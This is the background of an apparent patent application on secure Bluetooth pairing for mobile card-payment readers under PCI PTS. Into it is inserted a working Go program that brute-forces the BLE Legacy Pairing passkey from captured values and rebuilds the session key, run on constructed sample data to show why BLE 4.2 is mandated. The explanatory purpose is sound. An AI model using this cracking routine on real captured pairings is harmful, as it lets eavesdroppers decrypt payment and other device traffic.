“Mobile point of sale” (mPOS) solutions have developed very rapidly in recent years. These payment solutions generally use Bluetooth to pair a compact bank card reader with a communications terminal such as a smartphone or tablet.
As with classic card-based payment solutions, mPOS solutions face security risks that have to be taken into account. The bank card data (card number, expiry date, three-digit card verification code, etc.) and the cardholder's PIN code are sensitive data that fraudsters seek to retrieve, for example by breaking into the information systems of the actors that process and store them.
The PCI SSC (PCI Security Standards Council) is the body that issues security requirements for card payments and, for this purpose, defines the PCI (Payment Card Industry) standards with which all the actors concerned, in particular banking institutions and merchants, must comply. Among these, the PCI SSC has created a security standard specific to payment terminals, the PCI PTS (Payment Card Industry PIN Transaction Security) standard. PCI PTS is the security standard currently in force internationally for payment terminals.
mPOS devices that require entry of the cardholder's PIN code must therefore comply with a number of requirements defined by the PCI PTS standard in order to be certified by the PCI SSC. These requirements relate in particular to the physical and functional security of PIN-entry payment terminals. Since January 2015, for example, the PCI PTS standard has prohibited the use of Bluetooth Low Energy (BLE) versions below 4.2 in mPOS devices. This prohibition stems from a security flaw in the pairing process of BLE devices prior to version 4.2: BLE 4.2 introduced LE Secure Connections, whose Elliptic Curve Diffie-Hellman key agreement replaces the earlier legacy pairing, in which the link key is derived from a short temporary key that a passive eavesdropper can recover. Hence, to obtain certification from the PCI SSC, all new payment terminal models supporting BLE use version 4.2.
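As an added illustration (not part of this patent application, which does not name the flaw), the following Go program models the weakness in BLE Legacy Pairing, the pairing mode that version 4.2's LE Secure Connections replaced: the confirm value exchanged before the link is encrypted is a function of values sent in clear and of a temporary key TK that is either zero (Just Works) or a six-digit passkey, so a passive eavesdropper who captures one pairing can exhaust all 10^6 candidates, recover TK, and derive the STK that protects the link. All pairing parameters, addresses and nonces are constructed sample values; the functions e, c1 and s1 follow the Bluetooth Core Specification, Vol 3, Part H, with operands laid out in the spec's formula order rather than on-air byte order.

```go
package main

import (
	"crypto/aes"
	"crypto/rand"
	"encoding/binary"
	"fmt"
)

// e is the AES-128 block encryption used throughout BLE SMP (Core Spec Vol 3, Part H, 2.2.1).
func e(key, plaintext [16]byte) [16]byte {
	block, err := aes.NewCipher(key[:])
	if err != nil {
		panic(err) // unreachable: the key is always 16 bytes
	}
	var out [16]byte
	block.Encrypt(out[:], plaintext[:])
	return out
}

// xor16 returns a XOR b (arrays are passed by value, so a is a private copy).
func xor16(a, b [16]byte) [16]byte {
	for i := range a {
		a[i] ^= b[i]
	}
	return a
}

// PairingParams are the values a passive eavesdropper sees in clear during Legacy Pairing.
type PairingParams struct {
	Preq, Pres [7]byte // Pairing Request / Pairing Response PDU bytes
	Iat, Rat   byte    // initiating / responding address types
	Ia, Ra     [6]byte // initiating / responding device addresses
}

// c1 is the Legacy Pairing confirm function (Vol 3, Part H, 2.2.3):
//   p1 = pres || preq || rat || iat,  p2 = padding || ia || ra,
//   c1(k, r) = e(k, e(k, r XOR p1) XOR p2).
// Operands are laid out MSB-first as in the spec formulas; on-air SMP fields are
// little-endian, so bytes taken from a real capture must be reversed before use.
func c1(k, r [16]byte, p PairingParams) [16]byte {
	var p1, p2 [16]byte
	copy(p1[0:7], p.Pres[:])
	copy(p1[7:14], p.Preq[:])
	p1[14], p1[15] = p.Rat, p.Iat
	copy(p2[4:10], p.Ia[:])
	copy(p2[10:16], p.Ra[:])
	return e(k, xor16(e(k, xor16(r, p1)), p2))
}

// s1 derives the STK (Vol 3, Part H, 2.2.4): e(k, r1' || r2') with r1', r2' the
// 64 least significant bits of r1 and r2. The link is then encrypted under STK.
func s1(k, r1, r2 [16]byte) [16]byte {
	var r [16]byte
	copy(r[0:8], r1[8:16])
	copy(r[8:16], r2[8:16])
	return e(k, r)
}

// tkFromPasskey encodes a six-digit passkey as the 128-bit TK; Just Works uses 0.
func tkFromPasskey(passkey uint32) [16]byte {
	var tk [16]byte
	binary.BigEndian.PutUint32(tk[12:16], passkey)
	return tk
}

// crackTK recovers the passkey from one captured (Mconfirm, Mrand) pair by
// trying all 10^6 candidates: TK is the only secret input to c1.
func crackTK(mconfirm, mrand [16]byte, p PairingParams) (uint32, bool) {
	for pk := uint32(0); pk <= 999999; pk++ {
		if c1(tkFromPasskey(pk), mrand, p) == mconfirm {
			return pk, true
		}
	}
	return 0, false
}

// Demo runs a Passkey Entry pairing with constructed parameters (not from any
// real capture), then plays the eavesdropper. It returns the recovered passkey
// and whether the attacker's STK equals the one the two devices derived.
func Demo(passkey uint32) (uint32, bool) {
	p := PairingParams{
		Preq: [7]byte{0x01, 0x04, 0x00, 0x01, 0x10, 0x07, 0x07},
		Pres: [7]byte{0x02, 0x03, 0x00, 0x01, 0x10, 0x07, 0x07},
		Ia:   [6]byte{0xa1, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6},
		Ra:   [6]byte{0xb1, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6},
	}
	var mrand, srand [16]byte
	if _, err := rand.Read(mrand[:]); err != nil {
		panic(err)
	}
	if _, err := rand.Read(srand[:]); err != nil {
		panic(err)
	}
	tk := tkFromPasskey(passkey)
	mconfirm := c1(tk, mrand, p) // sent in clear, before Mrand is revealed
	stk := s1(tk, srand, mrand)  // STK = s1(TK, Srand, Mrand) on both devices

	// Attacker: every input used below was observable on the air.
	pk, ok := crackTK(mconfirm, mrand, p)
	if !ok {
		return 0, false
	}
	return pk, s1(tkFromPasskey(pk), srand, mrand) == stk
}

func main() {
	pk, ok := Demo(123456)
	fmt.Printf("recovered passkey %06d, STK reproduced: %v\n", pk, ok)
}
```

The search finishes in well under a second because the only unknown is a 20-bit value; with LE Secure Connections the confirm values instead commit to ECDH public keys, leaving nothing small enough to enumerate. Note also that a 4.2-capable reader still falls back to legacy pairing if its peer does not offer Secure Connections, which is why both ends of an mPOS link, the reader and the smartphone, have to support it.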
In an mPOS payment system, the communications terminal, typically a smartphone, must therefore itself support version 4.2 of the BLE standard. This version is as yet little deployed, however, and moving a smartphone or equivalent to BLE 4.2 happens only at the customer's own initiative.
There is therefore a need today for an efficient and reliable way of implementing an mPOS payment system that meets the requirements of the PCI PTS standard. In particular, no PCI PTS-compliant solution today enables fully secured pairing, in an mPOS system, between a peripheral device (for example one containing a card reader) and a communications terminal such as a smartphone or tablet.